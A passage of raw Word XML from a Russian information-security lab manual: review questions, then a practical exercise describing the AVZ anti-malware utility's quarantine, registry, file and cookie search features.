          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Что такое обфускация и для чего она используются?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5D4C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ВОПРОСЫ И ЗАДАНИЯ ДЛЯ ЗАЩИТЫ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Какие действия необходимо предпринять для защиты системы , с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>держащей уязвимость, от несанкционированного проникновения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="001F5D4C" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Возможно ли обеспечить100% защиту системы пользователя от действия вредоносных программ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="133" w:name="_Toc3811337"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> работа 1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Изучение работы программы AVZ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  изучить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">работу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программы AVZ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="cente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rStyle w:val="apple-style-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Утилита является прямым аналогом программ TrojanHunter и LavaSoft Ad-aware 6. Первичной задачей программы является удаление SpyWare и тр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="apple-style-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>янских программ.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Карантин</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В утилите AVZ предусмотрено две папки для хранения копий удаляемых вредоносных файлов (папка Infected - карантин для инфицированных файлов) и подозрительных файлов (папка "карантин"), найденных эвристическим анал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>затором или помещенных в карантин пользователем вручную.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Работа с карантином и папкой Infected абсолютно идентична и произв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дится в специальном окне, вызываемом из меню "Файл". Для работы с карант</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ном необходимо воспользоваться меню "Просмотр карантина", для работы с папкой Infected - "Файл/ Просмотр папки Infected".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Так же существует такая функция как автокарантин:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автокарантин - это встроенное средство AVZ, позволяющее автоматич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ски поместить в карантин все файлы, которые AVZ не опознает как компоне</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ты системы при помощи каталога безопасности Microsoft или как безопасные объекты при помощи базы безопасных объектов. Автоматический карантин очень удобен для оперативного сбора файлов на исследуемом компьютере для последующего изучения или проверки несколькими антивирусами в стаци</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нарных условиях. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автокарантин вызывается из меню "Файл\Автокарантин" или при наж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тии кнопку "Автодобавление" в </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>окне просмотра содержимого карантина</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сервис "Добавление в карантин по списку" удобен для массового доба</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ления файлов в карантин по заранее известному списку. Для вызова диалогов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го окна карантина по списку можно применить меню "Файл\Добавление в к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рантин по списку" или нажать кнопку "Добавить по списку" в </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>окне карантина</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Встроенные средства поиска </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>- Поиск данных в реестре</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 окне системы поиска в реестре размещается строка с образцом для п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иска. В этой строке необходимо ввести образец для поиска, например имя DLL файла или фрагмент URL, установившегося в качестве домашней страницы.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При нажатии кнопки "Пуск" производится запуск процесса поиска (сам процесс может длиться несколько минут - скорость поиска зависит от произв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дительности компьютера, количества ключей в реестре и настроек программы). Кнопка "Стоп" позволяет прервать процесс поиска.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Закладка "Протокол"</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Закладка "Протокол" содержит протокол работы программы. В протоколе содержатся найденные ключи, служебная информация, информация об удале</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ных ключах. Протокол </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>может быть скопирован через буфер обмена для разм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щения в конференции или отправки по электронной почте. Кроме того, можно сохранить протокол в текстовый файл (меню "Файл/Сохранить протокол").</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Закладка "Найденные ключи"</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Закладка "Найденные ключи" содержит таблицу с отсортированным по имени ключа списком всех найденных ключей (в таблице три столбца - "ключ", "параметр" и "значение").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Каждая строка таблицы содержит переключатель (checkbox), который позволяет отметить строку.</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Закладка "Параметры"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Данная закладка содержит настройки поиска и настройки программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Группа параметров "Искать в ключах" позволяет указать, в ключах к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ких ветвей реестра необходимо производить поиск.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Группа параметров "Просматривать при поиске" позволяет настроить область поиска. По умолчанию поиск ведется в именах и значениях параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Поиск файлов на диске</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Для поиска файлов на диске в AVZ встроена специальная сервисная функция, вызываемая из меню "Сервис / Поиск файлов на диске". Поиск фа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лов средствами AVZ имеет ряд преимуществ над системным поиском по ряду причин:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Система поиска файлов AVZ защищена встроенной в AVZ системой противодействия RootKit - это с сущности основная причина, по которой в AVZ встроена система поиска файлов. Маскировка процессов в памяти и файлов на диске присуща многим современным троянским программам, производится эта маскировка как правило перехватом API. В результате системные средства п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">иска позволят обнаружить на диске маскируемые файлы(и соответственно не позволят скопировать их для отправки на анализ). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Система поиска файлов связана с карантином AVZ - любой из найде</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных файлов может быть скопирован в карантин;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Поиск производится независимо от расширения файла, его местопол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жения и атрибутов - системные средства поиска часто при поиске показывают не все файлы (это особенно важно для системных папок типа Downloaded Program Files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поиск Cookie по данным</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Для оперативного анализа содержимого хранимых на компьютере Cookies можно применить "Поиск Cookie по данным". Этот анализатор изучает Cookie, которые сохраняются браузерами Internet Explorer и Mozilla Firefox. Окно системы поиска вызывается из меню «Сервис\Поиск cookies». Данный анализатор позволяет пользователю узнать, какие сайты сохраняют в cookies критичную для него информацию -  в последствии для этих сайтов можно с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>здать правила, блокирующие прием от них cookies.</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Особенностью системы поиска является то, что поиск может вестись о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новременно по нескольким текстовым образцам (при этом образцы разделяются пробелом или «;»). Поиск ведется с учетом того, что данные в cookie могу быть представлены в формате Base64, UUE, url-encoding или quoted-printable. Анал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
